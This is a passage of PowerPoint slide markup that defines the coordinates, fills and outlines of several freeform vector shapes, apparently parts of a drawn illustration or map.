                  <a:gd name="T20" fmla="*/ 12 w 25"/>
                  <a:gd name="T21" fmla="*/ 9 h 69"/>
                  <a:gd name="T22" fmla="*/ 13 w 25"/>
                  <a:gd name="T23" fmla="*/ 8 h 69"/>
                  <a:gd name="T24" fmla="*/ 13 w 25"/>
                  <a:gd name="T25" fmla="*/ 6 h 69"/>
                  <a:gd name="T26" fmla="*/ 13 w 25"/>
                  <a:gd name="T27" fmla="*/ 4 h 69"/>
                  <a:gd name="T28" fmla="*/ 16 w 25"/>
                  <a:gd name="T29" fmla="*/ 3 h 69"/>
                  <a:gd name="T30" fmla="*/ 17 w 25"/>
                  <a:gd name="T31" fmla="*/ 3 h 69"/>
                  <a:gd name="T32" fmla="*/ 17 w 25"/>
                  <a:gd name="T33" fmla="*/ 4 h 69"/>
                  <a:gd name="T34" fmla="*/ 20 w 25"/>
                  <a:gd name="T35" fmla="*/ 4 h 69"/>
                  <a:gd name="T36" fmla="*/ 20 w 25"/>
                  <a:gd name="T37" fmla="*/ 2 h 69"/>
                  <a:gd name="T38" fmla="*/ 20 w 25"/>
                  <a:gd name="T39" fmla="*/ 0 h 69"/>
                  <a:gd name="T40" fmla="*/ 21 w 25"/>
                  <a:gd name="T41" fmla="*/ 0 h 69"/>
                  <a:gd name="T42" fmla="*/ 21 w 25"/>
                  <a:gd name="T43" fmla="*/ 0 h 69"/>
                  <a:gd name="T44" fmla="*/ 23 w 25"/>
                  <a:gd name="T45" fmla="*/ 3 h 69"/>
                  <a:gd name="T46" fmla="*/ 24 w 25"/>
                  <a:gd name="T47" fmla="*/ 4 h 69"/>
                  <a:gd name="T48" fmla="*/ 24 w 25"/>
                  <a:gd name="T49" fmla="*/ 6 h 69"/>
                  <a:gd name="T50" fmla="*/ 24 w 25"/>
                  <a:gd name="T51" fmla="*/ 7 h 69"/>
                  <a:gd name="T52" fmla="*/ 25 w 25"/>
                  <a:gd name="T53" fmla="*/ 8 h 69"/>
                  <a:gd name="T54" fmla="*/ 24 w 25"/>
                  <a:gd name="T55" fmla="*/ 8 h 69"/>
                  <a:gd name="T56" fmla="*/ 24 w 25"/>
                  <a:gd name="T57" fmla="*/ 9 h 69"/>
                  <a:gd name="T58" fmla="*/ 24 w 25"/>
                  <a:gd name="T59" fmla="*/ 13 h 69"/>
                  <a:gd name="T60" fmla="*/ 24 w 25"/>
                  <a:gd name="T61" fmla="*/ 15 h 69"/>
                  <a:gd name="T62" fmla="*/ 23 w 25"/>
                  <a:gd name="T63" fmla="*/ 17 h 69"/>
                  <a:gd name="T64" fmla="*/ 23 w 25"/>
                  <a:gd name="T65" fmla="*/ 24 h 69"/>
                  <a:gd name="T66" fmla="*/ 23 w 25"/>
                  <a:gd name="T67" fmla="*/ 30 h 69"/>
                  <a:gd name="T68" fmla="*/ 22 w 25"/>
                  <a:gd name="T69" fmla="*/ 32 h 69"/>
                  <a:gd name="T70" fmla="*/ 22 w 25"/>
                  <a:gd name="T71" fmla="*/ 36 h 69"/>
                  <a:gd name="T72" fmla="*/ 20 w 25"/>
                  <a:gd name="T73" fmla="*/ 43 h 69"/>
                  <a:gd name="T74" fmla="*/ 16 w 25"/>
                  <a:gd name="T75" fmla="*/ 52 h 69"/>
                  <a:gd name="T76" fmla="*/ 16 w 25"/>
                  <a:gd name="T77" fmla="*/ 59 h 69"/>
                  <a:gd name="T78" fmla="*/ 14 w 25"/>
                  <a:gd name="T79" fmla="*/ 66 h 69"/>
                  <a:gd name="T80" fmla="*/ 13 w 25"/>
                  <a:gd name="T81" fmla="*/ 68 h 69"/>
                  <a:gd name="T82" fmla="*/ 13 w 25"/>
                  <a:gd name="T83" fmla="*/ 68 h 69"/>
                  <a:gd name="T84" fmla="*/ 12 w 25"/>
                  <a:gd name="T85" fmla="*/ 69 h 69"/>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25"/>
                  <a:gd name="T130" fmla="*/ 0 h 69"/>
                  <a:gd name="T131" fmla="*/ 25 w 25"/>
                  <a:gd name="T132" fmla="*/ 69 h 69"/>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25" h="69">
                    <a:moveTo>
                      <a:pt x="12" y="69"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="7" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="69"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36431" name="Freeform 163"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3302" y="2306"/>
                <a:ext cx="112" cy="99"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 3 w 112"/>
                  <a:gd name="T1" fmla="*/ 88 h 99"/>
                  <a:gd name="T2" fmla="*/ 3 w 112"/>
                  <a:gd name="T3" fmla="*/ 85 h 99"/>
                  <a:gd name="T4" fmla="*/ 0 w 112"/>
                  <a:gd name="T5" fmla="*/ 81 h 99"/>
                  <a:gd name="T6" fmla="*/ 4 w 112"/>
                  <a:gd name="T7" fmla="*/ 79 h 99"/>
                  <a:gd name="T8" fmla="*/ 7 w 112"/>
                  <a:gd name="T9" fmla="*/ 75 h 99"/>
                  <a:gd name="T10" fmla="*/ 6 w 112"/>
                  <a:gd name="T11" fmla="*/ 73 h 99"/>
                  <a:gd name="T12" fmla="*/ 12 w 112"/>
                  <a:gd name="T13" fmla="*/ 71 h 99"/>
                  <a:gd name="T14" fmla="*/ 11 w 112"/>
                  <a:gd name="T15" fmla="*/ 69 h 99"/>
                  <a:gd name="T16" fmla="*/ 13 w 112"/>
                  <a:gd name="T17" fmla="*/ 67 h 99"/>
                  <a:gd name="T18" fmla="*/ 16 w 112"/>
                  <a:gd name="T19" fmla="*/ 63 h 99"/>
                  <a:gd name="T20" fmla="*/ 16 w 112"/>
                  <a:gd name="T21" fmla="*/ 62 h 99"/>
                  <a:gd name="T22" fmla="*/ 15 w 112"/>
                  <a:gd name="T23" fmla="*/ 59 h 99"/>
                  <a:gd name="T24" fmla="*/ 12 w 112"/>
                  <a:gd name="T25" fmla="*/ 57 h 99"/>
                  <a:gd name="T26" fmla="*/ 12 w 112"/>
                  <a:gd name="T27" fmla="*/ 55 h 99"/>
                  <a:gd name="T28" fmla="*/ 11 w 112"/>
                  <a:gd name="T29" fmla="*/ 55 h 99"/>
                  <a:gd name="T30" fmla="*/ 6 w 112"/>
                  <a:gd name="T31" fmla="*/ 55 h 99"/>
                  <a:gd name="T32" fmla="*/ 5 w 112"/>
                  <a:gd name="T33" fmla="*/ 45 h 99"/>
                  <a:gd name="T34" fmla="*/ 5 w 112"/>
                  <a:gd name="T35" fmla="*/ 40 h 99"/>
                  <a:gd name="T36" fmla="*/ 3 w 112"/>
                  <a:gd name="T37" fmla="*/ 36 h 99"/>
                  <a:gd name="T38" fmla="*/ 4 w 112"/>
                  <a:gd name="T39" fmla="*/ 34 h 99"/>
                  <a:gd name="T40" fmla="*/ 4 w 112"/>
                  <a:gd name="T41" fmla="*/ 32 h 99"/>
                  <a:gd name="T42" fmla="*/ 6 w 112"/>
                  <a:gd name="T43" fmla="*/ 28 h 99"/>
                  <a:gd name="T44" fmla="*/ 11 w 112"/>
                  <a:gd name="T45" fmla="*/ 29 h 99"/>
                  <a:gd name="T46" fmla="*/ 13 w 112"/>
                  <a:gd name="T47" fmla="*/ 28 h 99"/>
                  <a:gd name="T48" fmla="*/ 15 w 112"/>
                  <a:gd name="T49" fmla="*/ 24 h 99"/>
                  <a:gd name="T50" fmla="*/ 18 w 112"/>
                  <a:gd name="T51" fmla="*/ 19 h 99"/>
                  <a:gd name="T52" fmla="*/ 18 w 112"/>
                  <a:gd name="T53" fmla="*/ 12 h 99"/>
                  <a:gd name="T54" fmla="*/ 20 w 112"/>
                  <a:gd name="T55" fmla="*/ 12 h 99"/>
                  <a:gd name="T56" fmla="*/ 30 w 112"/>
                  <a:gd name="T57" fmla="*/ 14 h 99"/>
                  <a:gd name="T58" fmla="*/ 42 w 112"/>
                  <a:gd name="T59" fmla="*/ 10 h 99"/>
                  <a:gd name="T60" fmla="*/ 55 w 112"/>
                  <a:gd name="T61" fmla="*/ 14 h 99"/>
                  <a:gd name="T62" fmla="*/ 66 w 112"/>
                  <a:gd name="T63" fmla="*/ 13 h 99"/>
                  <a:gd name="T64" fmla="*/ 81 w 112"/>
                  <a:gd name="T65" fmla="*/ 6 h 99"/>
                  <a:gd name="T66" fmla="*/ 90 w 112"/>
                  <a:gd name="T67" fmla="*/ 7 h 99"/>
                  <a:gd name="T68" fmla="*/ 103 w 112"/>
                  <a:gd name="T69" fmla="*/ 5 h 99"/>
                  <a:gd name="T70" fmla="*/ 110 w 112"/>
                  <a:gd name="T71" fmla="*/ 0 h 99"/>
                  <a:gd name="T72" fmla="*/ 112 w 112"/>
                  <a:gd name="T73" fmla="*/ 2 h 99"/>
                  <a:gd name="T74" fmla="*/ 106 w 112"/>
                  <a:gd name="T75" fmla="*/ 12 h 99"/>
                  <a:gd name="T76" fmla="*/ 96 w 112"/>
                  <a:gd name="T77" fmla="*/ 17 h 99"/>
                  <a:gd name="T78" fmla="*/ 92 w 112"/>
                  <a:gd name="T79" fmla="*/ 22 h 99"/>
                  <a:gd name="T80" fmla="*/ 93 w 112"/>
                  <a:gd name="T81" fmla="*/ 29 h 99"/>
                  <a:gd name="T82" fmla="*/ 89 w 112"/>
                  <a:gd name="T83" fmla="*/ 56 h 99"/>
                  <a:gd name="T84" fmla="*/ 51 w 112"/>
                  <a:gd name="T85" fmla="*/ 80 h 99"/>
                  <a:gd name="T86" fmla="*/ 22 w 112"/>
                  <a:gd name="T87" fmla="*/ 99 h 99"/>
                  <a:gd name="T88" fmla="*/ 17 w 112"/>
                  <a:gd name="T89" fmla="*/ 97 h 9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12"/>
                  <a:gd name="T136" fmla="*/ 0 h 99"/>
                  <a:gd name="T137" fmla="*/ 112 w 112"/>
                  <a:gd name="T138" fmla="*/ 99 h 9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12" h="99">
                    <a:moveTo>
                      <a:pt x="4" y="89"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="3" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="89"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36432" name="Freeform 164"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3302" y="2306"/>
                <a:ext cx="112" cy="99"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 3 w 112"/>
                  <a:gd name="T1" fmla="*/ 88 h 99"/>
                  <a:gd name="T2" fmla="*/ 3 w 112"/>
                  <a:gd name="T3" fmla="*/ 85 h 99"/>
                  <a:gd name="T4" fmla="*/ 0 w 112"/>
                  <a:gd name="T5" fmla="*/ 81 h 99"/>
                  <a:gd name="T6" fmla="*/ 4 w 112"/>
                  <a:gd name="T7" fmla="*/ 79 h 99"/>
                  <a:gd name="T8" fmla="*/ 7 w 112"/>
                  <a:gd name="T9" fmla="*/ 75 h 99"/>
                  <a:gd name="T10" fmla="*/ 6 w 112"/>
                  <a:gd name="T11" fmla="*/ 73 h 99"/>
                  <a:gd name="T12" fmla="*/ 12 w 112"/>
                  <a:gd name="T13" fmla="*/ 71 h 99"/>
                  <a:gd name="T14" fmla="*/ 11 w 112"/>
                  <a:gd name="T15" fmla="*/ 69 h 99"/>
                  <a:gd name="T16" fmla="*/ 13 w 112"/>
                  <a:gd name="T17" fmla="*/ 67 h 99"/>
                  <a:gd name="T18" fmla="*/ 16 w 112"/>
                  <a:gd name="T19" fmla="*/ 63 h 99"/>
                  <a:gd name="T20" fmla="*/ 16 w 112"/>
                  <a:gd name="T21" fmla="*/ 62 h 99"/>
                  <a:gd name="T22" fmla="*/ 15 w 112"/>
                  <a:gd name="T23" fmla="*/ 59 h 99"/>
                  <a:gd name="T24" fmla="*/ 12 w 112"/>
                  <a:gd name="T25" fmla="*/ 57 h 99"/>
                  <a:gd name="T26" fmla="*/ 12 w 112"/>
                  <a:gd name="T27" fmla="*/ 55 h 99"/>
                  <a:gd name="T28" fmla="*/ 11 w 112"/>
                  <a:gd name="T29" fmla="*/ 55 h 99"/>
                  <a:gd name="T30" fmla="*/ 6 w 112"/>
                  <a:gd name="T31" fmla="*/ 55 h 99"/>
                  <a:gd name="T32" fmla="*/ 5 w 112"/>
                  <a:gd name="T33" fmla="*/ 45 h 99"/>
                  <a:gd name="T34" fmla="*/ 5 w 112"/>
                  <a:gd name="T35" fmla="*/ 40 h 99"/>
                  <a:gd name="T36" fmla="*/ 3 w 112"/>
                  <a:gd name="T37" fmla="*/ 36 h 99"/>
                  <a:gd name="T38" fmla="*/ 4 w 112"/>
                  <a:gd name="T39" fmla="*/ 34 h 99"/>
                  <a:gd name="T40" fmla="*/ 4 w 112"/>
                  <a:gd name="T41" fmla="*/ 32 h 99"/>
                  <a:gd name="T42" fmla="*/ 6 w 112"/>
                  <a:gd name="T43" fmla="*/ 28 h 99"/>
                  <a:gd name="T44" fmla="*/ 11 w 112"/>
                  <a:gd name="T45" fmla="*/ 29 h 99"/>
                  <a:gd name="T46" fmla="*/ 13 w 112"/>
                  <a:gd name="T47" fmla="*/ 28 h 99"/>
                  <a:gd name="T48" fmla="*/ 15 w 112"/>
                  <a:gd name="T49" fmla="*/ 24 h 99"/>
                  <a:gd name="T50" fmla="*/ 18 w 112"/>
                  <a:gd name="T51" fmla="*/ 19 h 99"/>
                  <a:gd name="T52" fmla="*/ 18 w 112"/>
                  <a:gd name="T53" fmla="*/ 12 h 99"/>
                  <a:gd name="T54" fmla="*/ 20 w 112"/>
                  <a:gd name="T55" fmla="*/ 12 h 99"/>
                  <a:gd name="T56" fmla="*/ 30 w 112"/>
                  <a:gd name="T57" fmla="*/ 14 h 99"/>
                  <a:gd name="T58" fmla="*/ 42 w 112"/>
                  <a:gd name="T59" fmla="*/ 10 h 99"/>
                  <a:gd name="T60" fmla="*/ 55 w 112"/>
                  <a:gd name="T61" fmla="*/ 14 h 99"/>
                  <a:gd name="T62" fmla="*/ 66 w 112"/>
                  <a:gd name="T63" fmla="*/ 13 h 99"/>
                  <a:gd name="T64" fmla="*/ 81 w 112"/>
                  <a:gd name="T65" fmla="*/ 6 h 99"/>
                  <a:gd name="T66" fmla="*/ 90 w 112"/>
                  <a:gd name="T67" fmla="*/ 7 h 99"/>
                  <a:gd name="T68" fmla="*/ 103 w 112"/>
                  <a:gd name="T69" fmla="*/ 5 h 99"/>
                  <a:gd name="T70" fmla="*/ 110 w 112"/>
                  <a:gd name="T71" fmla="*/ 0 h 99"/>
                  <a:gd name="T72" fmla="*/ 112 w 112"/>
                  <a:gd name="T73" fmla="*/ 2 h 99"/>
                  <a:gd name="T74" fmla="*/ 106 w 112"/>
                  <a:gd name="T75" fmla="*/ 12 h 99"/>
                  <a:gd name="T76" fmla="*/ 96 w 112"/>
                  <a:gd name="T77" fmla="*/ 17 h 99"/>
                  <a:gd name="T78" fmla="*/ 92 w 112"/>
                  <a:gd name="T79" fmla="*/ 22 h 99"/>
                  <a:gd name="T80" fmla="*/ 93 w 112"/>
                  <a:gd name="T81" fmla="*/ 29 h 99"/>
                  <a:gd name="T82" fmla="*/ 89 w 112"/>
                  <a:gd name="T83" fmla="*/ 56 h 99"/>
                  <a:gd name="T84" fmla="*/ 51 w 112"/>
                  <a:gd name="T85" fmla="*/ 80 h 99"/>
                  <a:gd name="T86" fmla="*/ 22 w 112"/>
                  <a:gd name="T87" fmla="*/ 99 h 99"/>
                  <a:gd name="T88" fmla="*/ 17 w 112"/>
                  <a:gd name="T89" fmla="*/ 97 h 9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12"/>
                  <a:gd name="T136" fmla="*/ 0 h 99"/>
                  <a:gd name="T137" fmla="*/ 112 w 112"/>
                  <a:gd name="T138" fmla="*/ 99 h 9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12" h="99">
                    <a:moveTo>
                      <a:pt x="4" y="89"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="3" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
